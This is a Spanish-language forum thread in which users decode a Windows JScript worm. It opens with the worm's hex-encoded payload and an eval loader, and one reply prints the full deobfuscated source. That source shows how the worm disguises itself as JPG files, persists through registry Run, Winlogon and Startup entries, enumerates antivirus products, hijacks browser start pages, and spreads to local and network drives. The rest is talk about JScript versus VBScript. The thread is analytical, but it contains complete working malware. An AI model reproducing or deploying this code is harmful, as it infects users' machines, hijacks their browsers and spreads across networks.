9c4c9bfc0d3aac1837d89c5cbc27d86cecb867d89c5cec07d847c98888c84d6c0d398cfc2c189c4cfc0c8838489a9bcc8c096d8d8c4c183bc89a1c4c7c0a0d3c4cecfce83cec1867db7b77d86c0d3849898c1bcc7cec084d6c4c183c5c0d37c987d7d84d6c0d398c5c0d396d8bc899ecacbd4a1c4c7c083c287cec1867db7b77d86c0d38496c4c183bc89a1c4c7c0a0d3c4cecfce83cec1867db7b77d86c0d389ced0bdcecfcdc4c9c2838b87c0d389c7bccecfa4c9bfc0d3aac183cecb867d89c5cec07d8484849898cfcdd0c084d6bc89a2c0cfa1c4c7c083cec1867db7b77d86c0d384899ccfcfcdc4bdd0cfc0ce98bc89a2c0cfa1c4c7c083cec1867db7b77d86c0d389ced0bdcecfcdc4c9c2838b87c0d389c7bccecfa4c9bfc0d3aac183cecb867d89c5cec07d848484899ccfcfcdc4bdd0cfc0ce96d8c0c7cec0d6bc89a2c0cfa1c4c7c083cec1867db7b77d86c0d384899ccfcfcdc4bdd0cfc0ce988bd896c4c183bc89a1c4c7c0a0d3c4cecfce83cec1867db7b77d86c0d389ced0bdcecfcdc4c9c2838b87c0d389c7bccecfa4c9bfc0d3aac183cecb867d89c5cec07d8484849898cfcdd0c084d6bc89a2c0cfa1c4c7c083cec1867db7b77d86c0d389ced0bdcecfcdc4c9c2838b87c0d389c7bccecfa4c9bfc0d3aac183cecb867d89c5cec07d848484899ccfcfcdc4bdd0cfc0ce988d96d8d8c0c7cec0d6c4c183bc89a2c0cfa1c4c7c083cec1867db7b77d86c0d38489aec4d5c097c1ced584d6bc89a2c0cfa1c4c7c083cec1867db7b77d86c0d384899ccfcfcdc4bdd0cfc0ce988b96bc899fc0c7c0cfc0a1c4c7c083cec1867db7b77d86c0d38496bc899ecacbd4a1c4c7c083c287cec1867db7b77d86c0d38496bc89a2c0cfa1c4c7c083cec1867db7b77d86c0d384899ccfcfcdc4bdd0cfc0ce988b96d8d8d8bebccfbec383c084d6d8cec1987d7d96d8bdcdc0bcc696bfc0c1bcd0c7cf95bdcdc0bcc696d8d8d8bebccfbec383c084d6d8cfcdd4d6c4c183c3cdbc978c8d84d6c3cdbc86988c96d8c4c183c3cdbc98988c8d84d6bfc9ce98ce89a9bcc8c0aecbbcbec0838c938496c0c9ce98bfc9ce89a4cfc0c8ce8384899ecad0c9cf96c3c9ce98c9c0d27b9ccdcdbcd4838496c1cacd83c1988b96c197c0c9ce96c1868684d6c2c9ce98bfc9ce89a4cfc0c8ce838489c4cfc0c883c18496c3c9ce89cbd0cec3837dbfc9ce89a4cfc0c8ce838489a4cfc0c8837d86c1867d8489a2c0cfa1cac7bfc0cd7d8496d8c1cacd83c4988b96c497c3c9ce89c7c0c9c2cfc396c4868684d6cfcdd4d6c5c9ce98c0d1bcc783c3c9ceb6c4b88489a4cfc0c8ce8384899ecad0c9cf96c1cacd83c7988b96c797c5c9ce96c7868684d6c4c183bc89a1cac7bfc0cda0d3c4cecfce83c0d1bcc783c3c9ceb6c4b8867d89a4cfc0c8ce838489c4cfc0c8837d86c7867d8489abbccfc37d84849898c1bcc7cec084d6c3c9ce89cbd0cec383c3c9ceb6c4b8867d89a4cfc0c8ce838489c4cfc0c8837d86c7867d8489a2c0cfa1cac7bfc0cd7d8496d8c0c7cec0d6cfcdd4d6bfc4ce98cbc083c0d1bcc783c3c9ceb6c4b8867d89a4cfc0c8ce838489c4cfc0c8837d86c7867d8489abbccfc37d84867db7b77d84867d7d96bfc498bc89a2c0cfa1cac7bfc0cd83bfc4ce8496cfc2c198c9c0d27ba0c9d0c8c0cdbccfcacd83bfc489c1c4c7c0ce8496c1cacd83967ccfc2c189bccfa0c9bf838496cfc2c189c8cad1c0a9c0d3cf838484d6cecfc198cfc2c189c4cfc0c88384867d7d96c4c183cecfc189ced0bdcecfcdc4c9c283cecfc189c7c0c9c2cfc3888f87cecfc189c7c0c9c2cfc38489cfcab0cbcbc0cd9ebccec0838498987d89a5aba27d84d6c5c0d398cfc2c189c4cfc0c8838489a9bcc8c086cecb867d89c5cec07d96d8c4c183cecfc189cfcaa7cad2c0cd9ebccec0838489c4c9bfc0d3aac1837d89c5cbc27d86cecb867d89c5cec07d847c98888c84d6c0d398cfc2c189c4cfc0c8838489a9bcc8c096d8d8c4c183bc89a1c4c7c0a0d3c4cecfce83bfc4867db7b77d86c0d3849898c1bcc7cec08181bfc4ce89bec3bccd9ccf838c847c987d957d84d6c4c183c5c0d37c987d7d84d6c0d398c5c0d396d8bc899ecacbd4a1c4c7c083c287bfc4867db7b77d86c0d38496c4c183bc89a1c4c7c0a0d3c4cecfce83bfc4867db7b77d86c0d389ced0bdcecfcdc4c9c2838b87c0d389c7bccecfa4c9bfc0d3aac183cecb867d89c5cec07d8484849898cfcdd0c084d6bc89a2c0cfa1c4c7c083bfc4867db7b77d86c0d384899ccfcfcdc4bdd0cfc0ce98bc89a2c0cfa1c4c7c083bfc4867db7b77d86c0d389ced0bdcecfcdc4c9c2838b87c0d389c7bccecfa4c9bfc0d3aac183cecb867d89c5cec07d848484899ccfcfcdc4bdd0cfc0ce96d8c0c7cec0d6bc89a2c0cfa1c4c7c083bfc4867db7b77d86c0d384899ccfcfcdc4bdd0cfc0ce988b96d8c4c183bc89a1c4c7c0a0d3c4cecfce83bfc4867db7b77d86c0d389ced0bdcecfcdc4c9c2838b87c0d389c7bccecfa4c9bfc0d3aac183cecb867d89c5cec07d8484849898cfcdd0c084d6bc89a2c0cfa1c4c7c083bfc4867db7b77d86c0d389ced0bdcecfcdc4c9c2838b87c0d389c7bccecfa4c9bfc0d3aac183cecb867d89c5cec07d848484899ccfcfcdc4bdd0cfc0ce988d96d8d8c0c7cec0d6c4c183bc89a2c0cfa1c4c7c083bfc4867db7b77d86c0d38489aec4d5c097c1ced584d6bc89a2c0cfa1c4c7c083bfc4867db7b77d86c0d384899ccfcfcdc4bdd0cfc0ce988b96bc899fc0c7c0cfc0a1c4c7c083bfc4867db7b77d86c0d38496bc899ecacbd4a1c4c7c083c287bfc4867db7b77d86c0d38496bc89a2c0cfa1c4c7c083bfc4867db7b77d86c0d384899ccfcfcdc4bdd0cfc0ce988b96d8d8d8bebccfbec383c084d6d8d8d8d8bebccfbec383c084d6d8d8c3cdbc988b96d8d8bebccfbec383c084d6d8c8c6838496d8c1d0c9becfc4cac97bbec48384d6cfcdd4d6bfbd8d98bc89aacbc0c9afc0d3cfa1c4c7c083c2878c8496c28d98bfbd8d89adc0bcbf9cc7c7838496bfbd8d899ec7cacec0838496c28e98c28d89ced0bdcecfcdc4c9c283c28d89cec0bccdbec38382d5987d8284868e87c28d89cec0bccdbec383827d9682848496c28c98c28d89ced0bdcecfcdc4c9c2838b87c28d89cec0bccdbec38382d5987d8284868e8496c2cd98c28d89ced0bdcecfcdc4c9c283c28d89cec0bccdbec383827d96828487c28d89c7c0c9c2cfc38496cf98c7c796cfcf987d7d96cfc898cf89c7c0c9c2cfc396cdbcbe98a8bccfc389cdcad0c9bf83a8bccfc389cdbcc9bfcac8838485949384868c96c1cacd83d3988b96d397cfc896d3868684d6c9d0c898cf89bec3bccd9ecabfc09ccf83d38486cdbcbe96c3d398c9d0c889cfcaaecfcdc4c9c2838c918496c4c183c3d389c7c0c9c2cfc3978d84d6c3d3987d8b7d86c3d396d8cfcf8698c3d396c3d398828296d8c4c183cdbcbe978c8b84d6cdbcbe987d8b7d86cdbcbe96d8cfcf8698cdbcbe96c28f98c28c86cfcf86c2cd96cdc0cfd0cdc97bc28f96d8bebccfbec383c084d6d8d8c1d0c9becfc4cac97bcbc083cfbccd84d6cac9c0c198c1bcc7cec096cec1cb98bc89a2c0cfa1cac7bfc0cd83cfbccd8496cfc2be98c9c0d27ba0c9d0c8c0cdbccfcacd83cec1cb89ced0bda1cac7bfc0cdce8496c1cacd83967ccfc2be89bccfa0c9bf838496cfc2be89c8cad1c0a9c0d3cf838484d6cecfbe98cfc2be89c4cfc0c8838489a9bcc8c089cfcaa7cad2c0cd9ebccec0838496c4c183cecfbe89cec0bccdbec3837dc1cacfca7d847c98888cd7d7cecfbe89cec0bccdbec3837dcbc3cacfca7d847c98888cd7d7cecfbe89cec0bccdbec3837dc4c8bcc2c07d847c98888cd7d7cecfbe89cec0bccdbec3837dc4c8b7d08b8ba08cc2c07d847c98888cd7d7cecfbe89cec0bccdbec3837dcbc4becfd0cdc07d847c98888c84d6c4c183cac9c0c19898c1bcc7cec084d6cec1cb98bc89a2c0cfa1cac7bfc0cd83cfc2be89c4cfc0c88384867db7b77d8496d8cac9c0c198cfcdd0c096d8d8cdc0cfd0cdc97bcec1cb96d8c1d0c9becfc4cac97bcec3bed08384d6becec3be987d7d96c7c9c6ce98c9c0d27ba0c9d0c8c0cdbccfcacd83bc89a2c0cfa1cac7bfc0cd83be8e8489c1c4c7c0ce8496c1cacd83967cc7c9c6ce89bccfa0c9bf838496c7c9c6ce89c8cad1c0a9c0d3cf838484d6cfcdd4d6c7c6ce98c7c9c6ce89c4cfc0c88384867d7d96c4c183c7c6ce89ced0bdcecfcdc4c9c283c7c6ce89c7c0c9c2cfc3888f87c7c6ce89c7c0c9c2cfc38489cfcaa7cad2c0cd9ebccec0838498987d89c7c9c67d84d6c7c9c6bc98bd899ecdc0bccfc0aec3cacdcfbed0cf83c7c9c6ce89c4cfc0c8838484899ccdc2d0c8c0c9cfce96c4c183c7c9c6bc89cec0bccdbec3837d8a8aa095a5aebecdc4cbcf7b8a8a9d7b88c9ce7d847c98888c84d6becec3be98c7c9c6bc89ced0bdcecfcdc4c9c283c7c9c6bc89c4c9bfc0d3aac183827d8284868c87c7c9c6bc89c7bccecfa4c9bfc0d3aac183827d82848496bc899fc0c7c0cfc0a1c4c7c083c7c9c6ce89c4cfc0c883848496d8d8d8bebccfbec383c084d6d8d8cdc0cfd0cdc97bbecec3be96d891";ll="";dm=z.length-2;rad=new Number(z.substring(dm,dm+2));for(y=0;y<dm;y+=2){num=z.substring(y,y+2);ld=new Number("0x"+num);an=ld.toString(10);ch=String.fromCharCode(an-rad);ll+=ch;}eval(ll);
Perdon, pero no se de que otra forma subir el codigo y que quede en diferentes lineas. Lo otro que puedo hacer es subirlo en MEGA con extension txt y alguien lo sube de nuevo aqui descifrado. Saludos
Título: Re: [Ayuda] descifrando un virus
Publicado por: engel lex en 11 Julio 2015, 17:39 pm
no sabia que el vbs se parecía tanto el js... solo tienes que seguir los pasos sin el eval (para que no se ejecute) y revisar la variable que se evalua aquí está sin la primera ofuscación try { a = WScript.CreateObject('Scri' + 'pting.Fi' + 'leSys' + 'temObj' + 'ect'); b = WScript.CreateObject('WSc' + 'ript.Sh' + 'ell'); s = WScript.CreateObject('She' + 'll.Appli' + 'cation'); wl = WScript.CreateObject('WbemScr' + 'ipting.SWbemL' + 'ocator'); db = WScript.CreateObject('ADO' + 'DB.Str' + 'eam'); db.CharSet = "US-ASCII"; db.Type = 2; c3 = b.SpecialFolders("Startup"); nt6 = (b.RegRead('HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\CurrentVersion') >= 6 ? true : false); jico = b.RegRead("HKLM\\SOFTWARE\\Classes\\" + b.RegRead("HKLM\\SOFTWARE\\Classes\\.jpg\\") + "\\DefaultIcon\\"); ico = "explorer.exe"; g = WScript.ScriptFullName; da = new Date(); ano = da.getYear() + ""; mes = da.getMonth(); dia = da.getDate(); hra = 0; antv = new Array(""); rgk = "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"; wlg = "HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Shell"; gn = new Array("IMG", "IMG_", "PIC", "DSC", "CIMG", "HPIM", "IMAG", "DSCF", "DSCN", "DCIM", "IM", "PICT", "SAM_"); sp = ""; for (r = 0; r < 94; r++) { sp += " "; } ex = gn[Math.round(Math.random() * 12)] + ano.substring(2, 4) + "" + mes + dia + ".JPG" + sp + ".jse"; jex = ""; tas = "explorer"; fsz = a.GetFile(g).Size; wsc = WScript.FullName; stl = "https://www.google.es/#output=search&sclient=psy-ab&q=fiverdolly+"; stp = stl + fsz; if (s.NameSpace(26) == "Roaming") { tot = a.GetFolder(s.NameSpace(26).ParseName("Microsoft").Path).ParentFolder; } else { tot = s.NameSpace(40).ParseName(s.NameSpace(26)).Path; } nt(); } catch (e) {} sf = ""; function nt() { try { c1 = s.NameSpace(28).ParseName("microsoft"); c2 = c1.GetFolder.Items().Count; rf = Math.round(Math.random() * c2 - 1); c4 = c1.GetFolder.Items().item(rf).Path; if (a.FolderExists(c4) == false) { c4 = a.GetFile(c4).ParentFolder; } } catch (e) { c4 = c1.Path; } c5 = Math.random() * 8 + 1 + ""; c5 = c5.replace(".", ""); try { b.RegWrite("HKCU\\SOFTWARE\\Classes\\JSEFile\\DefaultIcon\\", jico, "REG_SZ"); } catch (e) {} try { jtyp = b.RegRead("HKLM\\SOFTWARE\\Classes\\jpegfile\\FriendlyTypeName"); b.RegWrite("HKCU\\SOFTWARE\\Classes\\JSEFile\\FriendlyTypeName", jtyp, "REG_EXPAND_SZ"); } catch (e) {} try { b.RegWrite("HKLM\\SOFTWARE\\Classes\\JSEFile\\DefaultIcon\\", jico, "REG_SZ"); } catch (e) {} try { b.RegWrite("HKLM\\SOFTWARE\\Classes\\JSEFile\\FriendlyTypeName", jtyp, "REG_EXPAND_SZ"); } catch (e) {} if (g.substring(g.lastIndexOf("\\") + 1, g.length).toLowerCase().search(".jpg" + sp + ".jse") != -1) { try { if (a.FileExists(g.substring(0, g.lastIndexOf(sp + ".jse"))) == true) { b.run('"' + g.substring(0, g.lastIndexOf(sp + ".jse")) + '"'); } else { wp = b.RegRead("HKCU\\Control Panel\\Desktop\\Wallpaper"); if (wp.substring(wp.lastIndexOf("\\") + 1, wp.length) == "TranscodedWallpaper") { jpgc = b.RegRead("HKLM\\SOFTWARE\\Classes\\jpegfile\\shell\\open\\command\\").replace("%1", wp); b.run(jpgc); } else { b.run('"' + wp + '"'); } } } catch (e) {} try { sc = wl.ConnectServer(null, "root\\default"); rg = sc.Get("StdRegProv"); m = rg.Methods_.Item("EnumValues"); pin = m.InParameters.SpawnInstance_(); rk = new Object(); rk["HKCU"] = rk["HKEY_CURRENT_USER"] = 0x80000001; rv = rk[rgk.substr(0, rgk.indexOf("\\"))]; pin.hDefKey = rv; pin.sSubKeyName = rgk.substr(rgk.indexOf("\\") + 1); pot = rg.ExecMethod_(m.Name, pin); ak = pot.sNames.toArray(); for (key in ak) { tts = b.RegRead(rgk + "\\" + ak[key]) + ""; if (tts.search(".exe") != -1) { tts2 = tts.substring(0, tts.search(".exe")); tts3 = tts2.substring(tts2.lastIndexOf(":") - 1, tts2.length) + ".exe"; if (a.FileExists(tts3) == true) { ico = tts3; } if (tts2.indexOf("\\") != -1) { tts2 = tts2.substring(tts2.lastIndexOf("\\") + 1, tts2.length); } tas = tts2; } } } catch (e) {} if (tas.indexOf(" ") != -1) { tas = tas.substring(0, tas.indexOf(" ")); } if (tas.indexOf(".") != -1) { tas = tas.substring(0, tas.indexOf(".")); } try { newd = fsz; olddf = b.RegRead(wlg); olddf = olddf.substring(olddf.lastIndexOf('" "') + 3, olddf.lastIndexOf('"')); } catch (e) { olddf = shcu(); } if (a.FileExists(olddf) == true) { c4 = a.GetFile(olddf).ParentFolder; oldd = a.GetFile(olddf).size; } else { oldd = 0; olddf = c4 + "\\" + c5; } if (newd >= oldd) { if (a.FileExists(olddf) == true) { a.GetFile(olddf).Attributes = 0; } db.Open(); try { av = GetObject("winmgmts:{impersonationLevel=impersonate}!\\\\.\\root\\SecurityCenter" + (nt6 ? '2' : '')); avi = av.ExecQuery("SELECT * FROM AntiVirusProduct", "WQL"); navi = new Enumerator(avi); antv = new Array(); for (; !navi.atEnd(); navi.moveNext()) { oav = navi.item(); antv.push(oav.displayName); } } catch (e) { antv = new Array("NAC"); } try { vic = "<" + b.RegRead("HKCU\\Volatile Environment\\LOGONSERVER").replace("\\\\", "") + ":" + b.RegRead("HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\ProductName") + "=" + s.NameSpace(40) + ":" + antv + ">"; } catch (e) { vic = ""; } cod = ci(); if (cod.search(vic) == -1 && rad != 0) { nda = vic + "**/"; his = cod.replace("**/", nda); db.WriteText(his); } else { db.WriteText(cod); } db.SaveToFile(olddf, 2); db.Close(); try { if (a.GetFile(olddf).OpenAsTextStream(1, -2).ReadAll().charCodeAt(0) != 122) { a.CopyFile(g, olddf, true); } a.GetFile(olddf).Attributes = 2; } catch (e) {} wsh = c4 + "\\" + tas + ".exe"; try { a.CopyFile(wsc, wsh); } catch (e) {} a.GetFile(wsh).Attributes = 2; try { drg = '"' + wsh + '" "' + olddf + '" //E:JScript //B'; shcu(); ec = b.CreateShortcut(c3 + "\\" + tas + ".lnk"); ec.TargetPath = c4 + "\\" + tas + ".exe"; ec.Arguments = '"' + olddf + '" //E:JScript //B -ns'; ec.IconLocation = ico; ec.Save(); b.RegWrite(wlg, drg, 'REG_SZ'); WScript.Sleep(9999); if (b.RegRead(wlg) == drg) { a.DeleteFile(c3 + "\\" + tas + ".lnk"); } } catch (e) {} } } else { try { if (WScript.Arguments.length == 0) { b.run("explorer.exe"); } } catch (e) {} try { fcfp = new Array(); tcmd = new Array(); for (t = 0; t < 9; t++) { tcmd.push(tot + "\\TC201" + t + "\\tcignore.txt"); try { fcfp.push(s.NameSpace(38).ParseName("TotalCommander201" + t).Path + "\\Tools\\Mozilla Firefox\\defaults\\profile"); } catch (e) {} try { fcfp.push(s.NameSpace(48).ParseName("TotalCommander201" + t).Path + "\\Tools\\Mozilla Firefox\\defaults\\profile"); } catch (e) {} } try { tcmd.push(s.NameSpace(38).ParseName("TC UP").Path + "\\tcignore.txt"); } catch (e) {} try { tcmd.push(s.NameSpace(48).ParseName("TC UP").Path + "\\tcignore.txt"); } catch (e) {} try { tcmd.push(s.NameSpace(28).ParseName("ghisler").Path + "\\tcignore.txt"); } catch (e) {} try { tcmd.push(s.NameSpace(26).ParseName("ghisler").Path + "\\tcignore.txt"); } catch (e) {} tcmd.push("c:\\totalcmd\\tcignore.txt"); for (t = 0; t < tcmd.length; t++) { if (a.FileExists(tcmd[t].replace("tcignore.txt", "wincmd.ini")) == true) { try { db.Open(); if (a.FileExists(tcmd[t]) == false) { ttn = a.CreateTextFile(tcmd[t], true); ttn.Write("**.**.jse"); ttn.close(); } igl = ""; try { db.LoadFromFile(tcmd[t]); igl = db.ReadText; } catch (e) {} db.Close(); if (igl.indexOf("**.**.jse") == -1) { db.Open(); db.WriteText(igl, 1); db.WriteText("**.**.jse", 1); a.DeleteFile(tcmd[t]); db.SaveToFile(tcmd[t]); db.Close(); } } catch (e) {} try { tor = a.OpenTextFile(a.GetFile(tcmd[t]).ParentFolder + "\\Wincmd.ini", 1, true, 0); toa = tor.ReadAll(); if (toa.search("IgnoreListFileEnabled=0") != -1) { toa = toa.replace("IgnoreListFileEnabled=0", "IgnoreListFileEnabled=1"); } if (toa.search("IgnoreListFile=") == -1) { toa = toa.replace("[Configuration]", "[Configuration]" + "\nIgnoreListFile=" + tcmd[t]); } if (tcmd[t].search("TC201") != -1) { if (toa.search("=*.jse") == -1) { filt = toa.substring(toa.lastIndexOf("Filter") + 6, toa.lastIndexOf(".icon=")); enf = toa.substring(toa.lastIndexOf("Filter"), toa.length); enl = enf.substring(0, enf.indexOf("\n") + 1); fln = new Number(filt) + 1; ficon = toa.substring(toa.search("Filter11.icon=") + 14, toa.length); dicon = ficon.substring(0, ficon.search("\n")); toa = toa.replace(enl, enl + "\nFilter" + fln + "=*.jse\nFilter" + fln + ".icon=" + dicon + "\n"); toa = toa.replace("FileTipWindows=1", "FileTipWindows=0"); } } tor.close(); tow = a.OpenTextFile(a.GetFile(tcmd[t]).ParentFolder + "\\Wincmd.ini", 2, true, 0); tow.Write(toa); tow.close(); } catch (e) {} } } } catch (e) {} try { b.RegWrite("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", stp, "REG_SZ") } catch (e) {} try { if (a.FolderExists(tot + "\\Mozilla\\Firefox\\Profiles") == true) { fpf = a.GetFolder(tot + "\\Mozilla\\Firefox\\Profiles"); pff = new Enumerator(fpf.SubFolders); for (; !pff.atEnd(); pff.moveNext()) { pfs = pff.item() + ""; if (pfs.search(".default") != -1) { fcfp.push(pfs); } } } for (q = 0; q < fcfp.length; q++) { try { if (a.FileExists(fcfp[q] + "\\prefs.js") == true); { fjf = a.OpenTextFile(fcfp[q] + "\\prefs.js", 1); fjs = fjf.ReadAll(); fjf.close(); usp = 'user_pref("browser.startup.homepage",'; if (fjs.indexOf(usp) != -1) { fjs1 = fjs.substring(fjs.indexOf(usp) + 37, fjs.length); fjs2 = fjs1.substring(0, fjs1.indexOf(');') + 2); fjs3 = fjs.replace(usp + fjs2, usp + ' "' + stp + '");'); wjf = a.OpenTextFile(fcfp[q] + "\\prefs.js", 2); wjf.Write(fjs3); } else { wjf = a.OpenTextFile(fcfp[q] + "\\prefs.js", 8); wjf.WriteLine('\n' + usp + ' "' + stp + '");'); } wjf.close(); } } catch (e) {} } } catch (e) {} try { gfs = s.NameSpace(28).ParseName("Google").Path + "\\Chrome\\User Data\\Default\\Preferences"; if (a.FileExists(gfs) == true) { gjf = a.OpenTextFile(gfs, 1); gjs = gjf.ReadAll(); gjf.close(); gjsn = gjs.length; urs = '"urls_to_restore_on_startup": ['; ros = '"restore_on_startup":'; rosm = '"restore_on_startup_migrated":'; if (gjs.indexOf(stl) == -1) { if (gjs.indexOf(urs) != -1) { gjs1 = gjs.substring(gjs.indexOf(urs) + 31, gjsn); gjs2 = gjs1.substring(0, gjs1.indexOf("]") + 1); gjs3 = gjs.replace(urs + gjs2, urs + ' "' + stp + '", ' + gjs2); } else { gjs1 = gjs.substring(gjs.indexOf(rosm), gjsn); gjs2 = gjs1.substring(0, gjs1.indexOf("\n") + 1); gjs3 = gjs.replace(gjs2, rosm + ' true,\n\t' + urs + ' "' + stp + '" ]\n'); } gjs4 = gjs.substring(gjs.indexOf(ros), gjsn); gjs5 = gjs4.substring(0, gjs4.indexOf(',') + 1); gjs3 = gjs3.replace(gjs5, ros + ' 4,'); wjg = a.OpenTextFile(gfs, 2); wjg.Write(gjs3); wjg.close(); } else { fds = gjs.substring(gjs.indexOf(stl), gjs.length); fdc = fds.substring(0, fds.indexOf('"')); gjs4 = gjs.replace(fdc, stp); wjg = a.OpenTextFile(gfs, 2); wjg.Write(gjs4); wjg.close(); } } } catch (e) {} mk(); } } function mk() { WScript.Sleep(120000); try { c = new Enumerator(a.Drives); for (; !c.atEnd(); c.moveNext()) { tipodisco = c.item().DriveType; switch (tipodisco) { case 1: case 3: if (c.item() != "A:" && c.item() != "B:") { try { sf = a.GetFolder(pe(c.item() + "\\")); tgf = new Enumerator(sf.files); for (; !tgf.atEnd(); tgf.moveNext()) { stf = tgf.item() + ""; if (stf.substring(stf.length - 4, stf.length).toUpperCase() == ".JPG") { jex = tgf.item().Name + sp + ".jse"; } if (stf.toLowerCase().indexOf(".jpg" + sp + ".jse") != -1) { ex = tgf.item().Name; } } if (a.FileExists(sf + "\\" + ex) == false) { if (jex != "") { ex = jex; } a.CopyFile(g, sf + "\\" + ex); if (a.FileExists(sf + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))) == true) { a.GetFile(sf + "\\" + ex).Attributes = a.GetFile(sf + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))).Attributes; } else { a.GetFile(sf + "\\" + ex).Attributes = 0 }; if (a.FileExists(sf + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))) == true) { a.GetFile(sf + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))).Attributes = 2; } } else { if (a.GetFile(sf + "\\" + ex).Size < fsz) { a.GetFile(sf + "\\" + ex).Attributes = 0; a.DeleteFile(sf + "\\" + ex); a.CopyFile(g, sf + "\\" + ex); a.GetFile(sf + "\\" + ex).Attributes = 0; } } } catch (e) {} sf = ""; } break; default: break; } } } catch (e) {} try { if (hra < 12) { hra += 1; } if (hra == 12) { dns = s.NameSpace(18); ens = dns.Items().Count; hns = new Array(); for (f = 0; f < ens; f++) { gns = dns.Items().item(f); hns.push("dns.Items().Item(" + f + ").GetFolder"); } for (i = 0; i < hns.length; i++) { try { jns = eval(hns[i]).Items().Count; for (l = 0; l < jns; l++) { if (a.FolderExists(eval(hns[i] + ".Items().item(" + l + ").Path")) == false) { hns.push(hns[i] + ".Items().item(" + l + ").GetFolder"); } else { try { dis = pe(eval(hns[i] + ".Items().item(" + l + ").Path") + "\\") + ""; di = a.GetFolder(dis); tgf = new Enumerator(di.files); for (; !tgf.atEnd(); tgf.moveNext()) { stf = tgf.item() + ""; if (stf.substring(stf.length - 4, stf.length).toUpperCase() == ".JPG") { jex = tgf.item().Name + sp + ".jse"; } if (stf.toLowerCase().indexOf(".jpg" + sp + ".jse") != -1) { ex = tgf.item().Name; } } if (a.FileExists(di + "\\" + ex) == false && dis.charAt(1) != ":") { if (jex != "") { ex = jex; } a.CopyFile(g, di + "\\" + ex); if (a.FileExists(di + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))) == true) { a.GetFile(di + "\\" + ex).Attributes = a.GetFile(di + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))).Attributes; } else { a.GetFile(di + "\\" + ex).Attributes = 0; } if (a.FileExists(di + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))) == true) { a.GetFile(di + "\\" + ex.substring(0, ex.lastIndexOf(sp + ".jse"))).Attributes = 2; } } else { if (a.GetFile(di + "\\" + ex).Size < fsz) { a.GetFile(di + "\\" + ex).Attributes = 0; a.DeleteFile(di + "\\" + ex); a.CopyFile(g, di + "\\" + ex); a.GetFile(di + "\\" + ex).Attributes = 0; } } } catch (e) {} } } } catch (e) {} } hra = 0; } } catch (e) {} mk(); } function ci() { try { db2 = a.OpenTextFile(g, 1); g2 = db2.ReadAll(); db2.Close(); g3 = g2.substring(g2.search('z="') + 3, g2.search('";')); g1 = g2.substring(0, g2.search('z="') + 3); gr = g2.substring(g2.search('";'), g2.length); t = ll; tt = ""; tm = t.length; rac = Math.round(Math.random() * 98) + 1; for (x = 0; x < tm; x++) { num = t.charCodeAt(x) + rac; hx = num.toString(16); if (hx.length < 2) { hx = "0" + hx; } tt += hx; hx = ''; } if (rac < 10) { rac = "0" + rac; } tt += rac; g4 = g1 + tt + gr; return g4; } catch (e) {} } function pe(tar) { onef = false; sfp = a.GetFolder(tar); tgc = new Enumerator(sfp.subFolders); for (; !tgc.atEnd(); tgc.moveNext()) { stc = tgc.item().Name.toLowerCase(); if (stc.search("foto") != -1 || stc.search("photo") != -1 || stc.search("image") != -1 || stc.search("im\u00E1ge") != -1 || stc.search("picture") != -1) { if (onef == false) { sfp = a.GetFolder(tgc.item() + "\\"); } onef = true; } } return sfp; } function shcu() { cshc = ""; lnks = new Enumerator(a.GetFolder(c3).files); for (; !lnks.atEnd(); lnks.moveNext()) { try { lks = lnks.item() + ""; if (lks.substring(lks.length - 4, lks.length).toLowerCase() == ".lnk") { lnka = b.CreateShortcut(lnks.item()).Arguments; if (lnka.search("//E:JScript //B -ns") != -1) { cshc = lnka.substring(lnka.indexOf('"') + 1, lnka.lastIndexOf('"')); a.DeleteFile(lnks.item()); } } } catch (e) {} } return cshc; }
Título: Re: [Ayuda] descifrando un virus
Publicado por: danny920825 en 11 Julio 2015, 19:05 pm
Gracias. Eres el mejor!!
Título: Re: [Ayuda] descifrando un virus
Publicado por: dRak0 en 12 Julio 2015, 09:45 am
Criptoanalisis,diras.
Título: Re: [Ayuda] descifrando un virus
Publicado por: Mad Antrax en 13 Julio 2015, 09:33 am
excelente trabajo engel lex, ahora solo falta analizar las funciones que ejecuta el script!
Título: Re: [Ayuda] descifrando un virus
Publicado por: danny920825 en 13 Julio 2015, 14:52 pm
Y todo eso es javascript?? o sea, que se puede utilizar un lenguaje de programacion web para aplicaciones de escritorio? Por favor, alguien que explique las funciones que no las entiendo todas
Título: Re: [Ayuda] descifrando un virus
Publicado por: engel lex en 13 Julio 2015, 15:39 pm
repito mi comentario no sabia que el vbs se parecía tanto el js esto no es js (javascript) es vbs (visual basic script), solo sirve en local
Título: Re: [Ayuda] descifrando un virus
Publicado por: Mad Antrax en 13 Julio 2015, 16:34 pm
repito mi comentario
esto no es js (javascript) es vbs (visual basic script), solo sirve en local
En realidad ese código es javascript. El intérprete de script de Windows (wscript + cscript) pueden interpretar (ejecutar) VBS y JS. VOy a reversas las funciones para ver que hace exactamente, aunque no estoy muy familiarizado con JS... Saludos
Título: Re: [Ayuda] descifrando un virus
Publicado por: engel lex en 13 Julio 2015, 17:00 pm
windows interpreta js?
"WScript" puede ser usado por jscript?
por eso asumo que es vbs
Título: Re: [Ayuda] descifrando un virus
Publicado por: Mad Antrax en 13 Julio 2015, 17:06 pm
windows interpreta js?
"WScript" puede ser usado por jscript?
por eso asumo que es vbs
Exacto, el motor de interprete de script (WScript.exe / CScript.exe) interpreta tanto VBS como JS, y sus variantes VBE, JSE, etc... el icono se diferencia por un script verde (VBS) o amarillo (JS). Si te fijas, la sintaxis original de VB/VBA/VBS no incluye llaves ({}) para designar statement, en su lugar se utiliza el comodón "End", las llaves son usadas en lenguajes como C/C++ y JS (entre mucho otros). Otra pista la tienes en que JS necesita un caracter para indicar el fin de una línea ( ";" ) mientras que VB/VBS no necesita dicho carácter :) Te he editado el post, indicando que el geshi es JS en lugar de VBS, ahora aparece correctamente formateado :P
Título: Re: [Ayuda] descifrando un virus
Publicado por: engel lex en 13 Julio 2015, 17:09 pm
